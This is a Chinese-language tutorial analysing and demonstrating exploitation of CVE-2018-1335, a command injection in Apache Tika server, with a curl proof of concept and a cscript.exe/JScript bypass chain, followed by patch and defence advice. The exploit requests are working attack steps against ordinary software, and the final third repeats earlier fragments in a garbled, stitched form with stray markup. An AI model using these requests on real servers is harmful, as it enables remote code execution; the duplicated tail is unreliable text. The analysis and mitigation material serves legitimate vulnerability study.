Apache Tika 命令注入漏洞(CVE-2018-1335)深度分析与利用教学<\/h1>

一、漏洞概述<\/h2>

CVE-2018-1335是Apache Tika服务器组件中的一个命令注入漏洞，影响1.18之前的所有版本。该漏洞允许攻击者通过精心构造的HTTP请求头，在运行tika-server的服务器上执行任意命令。<\/p>

漏洞关键信息<\/strong>：<\/p>

影响版本：Apache Tika 1.18之前的所有版本<\/li>
修复版本：Apache Tika 1.18及更高版本<\/li>
漏洞类型：命令注入<\/li>
攻击向量：HTTP请求头<\/li>
受影响组件：tika-server独立服务<\/li> <\/ul>
二、漏洞背景<\/h2>
Apache Tika简介<\/h3>
Apache Tika是一个内容分析工具包，能够检测和提取上千种不同文件类型(如PPT、XLS、PDF等)中的元数据和文本。主要组件包括：<\/p>

Java库<\/li>
命令行工具<\/li>
独立服务器(tika-server) - 带有REST API接口<\/li> <\/ol>
漏洞发现<\/h3>
通过对比1.17(漏洞版本)和1.18(修复版本)的源代码差异，发现关键修改在于添加了allowable_header_chars<\/code>代码块，用于过滤HTTP头中的特殊字符。<\/p>
三、漏洞原理分析<\/h2> 漏洞入口点<\/h3> 漏洞存在于processHeaderConfig<\/code>函数中，该函数处理HTTP请求头并动态设置对象属性。关键前缀为X-Tika-OCR<\/code>的请求头会被用于配置TesseractOCRConfig<\/code>对象。<\/p> 命令注入路径<\/h3> 攻击者通过X-Tika-OCRTesseractPath<\/code>头注入命令<\/li> 命令被传递到TesseractOCRParser.java<\/code>中的doOCR<\/code>函数<\/li> doOCR<\/code>函数使用ProcessBuilder<\/code>构建并执行命令<\/li> <\/ol> 技术限制与绕过<\/h3> 原始漏洞存在以下限制：<\/p> 只能控制命令的第一部分(应用路径)<\/li> 无法传递多个参数或使用命令连接符(&, |, >等)<\/li> Windows下引号后的内容会被忽略<\/li> <\/ol> 绕过方法：使用Windows Script Host(cscript.exe)作为执行载体，通过\/\/E:engine<\/code>参数指定脚本引擎，上传包含恶意代码的"图像"文件。<\/p> 四、漏洞利用步骤<\/h2> 基本利用(PoC)<\/h3> curl -T test.tiff http:\/\/localhost:9998\/meta --header "X-Tika-OCRTesseractPath: \"calc.exe\""<\/span> <\/span><\/span><\/code><\/pre>完整利用链<\/h3> 准备一个包含恶意JScript\/VBScript代码的文件(内容示例)：<\/li> <\/ol> var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd \/c calc.exe'); <\/code><\/pre> 构造HTTP请求：<\/li> <\/ol> curl -T malicious.jp2 http:\/\/victim:9998\/meta \ <\/span><\/span><\/span><\/span>--header "X-Tika-OCRTesseractPath: \"cscript.exe\""<\/span> \ <\/span><\/span><\/span><\/span>--header "X-Tika-OCRLanguage: \/\/E:Jscript"<\/span> \ <\/span><\/span><\/span><\/span>--header "Content-Type: image\/jp2"<\/span> <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 使用image\/jp2<\/code>内容类型绕过文件验证<\/li> X-Tika-OCRTesseractPath<\/code>指定cscript.exe作为执行程序<\/li> X-Tika-OCRLanguage<\/code>参数设置为\/\/E:Jscript<\/code>指定脚本引擎<\/li> <\/ul> 五、漏洞修复方案<\/h2> 升级到Apache Tika 1.18或更高版本<\/li> 官方修复措施：添加了allowable_header_chars<\/code>过滤特殊字符<\/li> 移除了不安全的processHeaderConfig<\/code>函数<\/li> 加强了对HTTP头内容的验证<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 不在不受信环境中运行tika-server<\/li> 如必须公开服务，应部署在网络隔离区域<\/li> 实施严格的输入验证和过滤<\/li> 使用最小权限原则运行服务<\/li> 定期更新到最新版本<\/li> <\/ol> 七、学习资源<\/h2> 官方文档：<\/p> Apache Tika官网：https:\/\/tika.apache.org\/<\/li> Tika REST API：https:\/\/wiki.apache.org\/tika\/TikaJAXRS<\/li> <\/ul> <\/li> 漏洞相关资源：<\/p> 受影响版本下载：https:\/\/archive.apache.org\/dist\/tika\/tika-server-1.17.jar<\/li> Rhino安全实验室PoC：https:\/\/github.com\/RhinoSecurityLabs\/CVEs\/tree\/master\/CVE-2018-1335<\/li> <\/ul> <\/li> 相关技术：<\/p> Windows LOLBins：https:\/\/github.com\/api0cradle\/LOLBAS<\/li> Process Monitor工具：https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/procmon<\/li> <\/ul> <\/li> <\/ol> 八、总结<\/h2> CVE-2018-1335展示了即使看似简单的命令注入漏洞，在实际利用中也可能面临各种技术限制。通过深入分析系统行为和Windows特性，最终找到了使用cscript.exe的绕过方法。这提醒开发者在构造系统命令时必须严格验证所有用户输入，即使是非直接输入参数。<\/p>

Apache Tika 命令注入漏洞(CVE-2018-1335)深度分析与利用教学<\/h1>

二、漏洞背景<\/h2>

漏洞发现<\/h3>
通过对比1.17(漏洞版本)和1.18(修复版本)的源代码差异，发现关键修改在于添加了`allowable_header_chars<\/code>代码块，用于过滤HTTP头中的特殊字符。<\/p>`

漏洞入口点<\/h3>
漏洞存在于`processHeaderConfig<\/code>函数中，该函数处理HTTP请求头并动态设置对象属性。关键前缀为X-Tika-OCR<\/code>的请求头会被用于配置TesseractOCRConfig<\/code>对象。<\/p>`

Apache Tika 命令注入漏洞(CVE-2018-1335)深度分析与利用教学<\/h1>

二、漏洞背景<\/h2>

漏洞发现<\/h3> 通过对比1.17(漏洞版本)和1.18(修复版本)的源代码差异，发现关键修改在于添加了allowable_header_chars<\/code>代码块，用于过滤HTTP头中的特殊字符。<\/p>

漏洞入口点<\/h3> 漏洞存在于processHeaderConfig<\/code>函数中，该函数处理HTTP请求头并动态设置对象属性。关键前缀为X-Tika-OCR<\/code>的请求头会被用于配置TesseractOCRConfig<\/code>对象。<\/p>

漏洞发现<\/h3>
通过对比1.17(漏洞版本)和1.18(修复版本)的源代码差异，发现关键修改在于添加了`allowable_header_chars<\/code>代码块，用于过滤HTTP头中的特殊字符。<\/p>`

漏洞入口点<\/h3>
漏洞存在于`processHeaderConfig<\/code>函数中，该函数处理HTTP请求头并动态设置对象属性。关键前缀为X-Tika-OCR<\/code>的请求头会被用于配置TesseractOCRConfig<\/code>对象。<\/p>`